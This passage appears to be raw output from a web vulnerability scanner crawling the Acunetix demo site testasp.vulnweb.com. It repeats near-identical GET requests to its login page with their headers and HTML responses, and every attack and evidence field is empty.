style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
